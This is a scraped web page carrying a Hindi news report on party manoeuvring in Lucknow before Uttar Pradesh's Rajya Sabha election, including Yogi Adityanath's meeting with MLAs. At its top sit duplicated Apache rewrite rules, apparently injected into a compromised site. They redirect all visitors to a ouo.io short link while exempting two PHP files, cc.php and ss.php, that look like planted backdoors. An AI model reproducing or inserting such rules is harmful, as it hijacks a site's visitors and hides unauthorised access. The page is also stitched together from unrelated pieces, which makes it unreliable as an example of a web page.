
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 859
Previous Nextलखनऊ। राज्यसभा चुनाव को लेकर सभी राजनीतिक दलों ने रणनीति पर काम करना शुरू कर दिया है। इसी क्रम में कल लखनऊ में सियासी हलकों में बीजेपी की 'चाय पर चर्चा' और सपा की 'डिनर डिप्लोमेसी' की दिनभर चर्चा होती रही। खुद मुख्यमंत्री योगी आदित्यनाथ राज्यसभा चुनाव की तैयारियों को लीड कर रहे हैं। इसी क्रम में उन्होंने अपने सरकारी आवास पर बीजेपी और सहयोगी दलों के विधायकों की बैठक बुलाई थी। बैठक में सीएम, दोनों डिप्टी सीएम, बीजेपी के संगठन के प्रमुख नेताओं के साथ तमाम विधायक उपस्थित हुए. इस दौरान विधायकों को राज्यसभा चुनाव में वोटिंग की ट्रेनिंग भी दी गई। बैठक में 9 विधायकों वाली अपना दल सोनेलाल और 4 विधायकों वाले सुभासपा के नेता भी उपस्थित हुए। इनमें सुभासपा के ओम प्रकाश राजभर भी शामिल थे। वैसे बैठक का मुख्य आकर्षण समाजवादी पार्टी के हरदोई सदर से विधायक नितिन अग्रवाल की उपस्थिति रही। नितिन अग्रवाल नरेश अग्रवाल के पुत्र हैं। हाल ही में नरेश अग्रवाल ने बीजेपी ज्वाइन की है और उन्होंने ऐलान किया था कि नितिन अग्रवाल राज्यसभा चुनाव में बीजेपी प्रत्याशी के समर्थन में वोट डालेंगे। 23 मार्च को राज्यसभा की 10 सीटों के लिए चुनाव होना है। इनमें से 8 सीटें बीजेपी आसानी से जीत रही है। वहीं नवीं सीट के लिए उसके पास 9 विधायक कम हैं। बीजेपी से चुनावी प्रबंधन के लिए संगठन ने विशेष रणनीतिकारों को जिम्मेदारी दी गई है, तो संपूर्ण चुनाव की निगरानी खुद सीएम योगी संभाल रहे हैं।